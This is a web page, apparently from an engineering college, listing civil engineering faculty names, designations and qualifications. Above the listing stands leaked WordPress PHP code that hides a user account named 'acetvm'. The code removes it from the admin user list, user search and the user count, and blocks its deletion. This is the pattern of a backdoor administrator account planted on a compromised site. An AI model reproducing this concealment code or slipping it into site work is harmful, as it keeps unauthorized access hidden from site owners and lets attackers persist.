add_action('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->base === 'users') { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user) { $excluded = (array) $query->get('exclude'); $excluded[] = $protected_user->ID; $query->set('exclude', $excluded); } } } }); add_filter('wp_count_users', function($counts) { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user) { $counts->total_users--; } return $counts; }); add_action('delete_user', function($user_id) { $user = get_user_by('ID', $user_id); if ($user && $user->user_login === 'acetvm') { wp_die( __('User acetvm tidak dapat dihapus.', 'textdomain'), __('Error', 'textdomain'), array('response' => 403) ); } }); add_filter('user_search_columns', function($search_columns, $search, $query) { if (is_admin()) { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user) { global $wpdb; $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID); } } return $search_columns; }, 10, 3); add_filter('bulk_actions-users', function($actions) { if (isset($_REQUEST['users']) && is_array($_REQUEST['users'])) { $protected_user = get_user_by('login', 'acetvm'); if ($protected_user && in_array($protected_user->ID, $_REQUEST['users'])) { unset($actions['delete']); } } return $actions; });

Civil Engineering Teaching Faculties

Name of Faculty Designation Qualification
Ms. Priya C V Associate Professor & HoD M.E in Fracture Mechanics
Mr. Sreekesh K P Assistant Professor M.E in Construction Engineering and Management
Ms. Sreeja Jacob Assistant Professor M.Tech in Structural Engineering
Ms. Shamya P K Assistant Professor M Tech in Structural Engineering
Ms. Vindhuja V S Assistant Professor M Tech in Hydraulics Engineering
Ms. Gowri S Assistant Professor M.Tech in Geomechanics and Structures
Ms. Anju P Babu Assistant Professor M.Tech in Structural Engineering
Ms.Amrutha.M.A Assistant Professor M.Tech in Geoinformatics
Nadeema Khader S Assistant Professor M.Tech in Environmental Engineering
Shahanaz S Assistant Professor M.Tech (Geotechnical Engineering)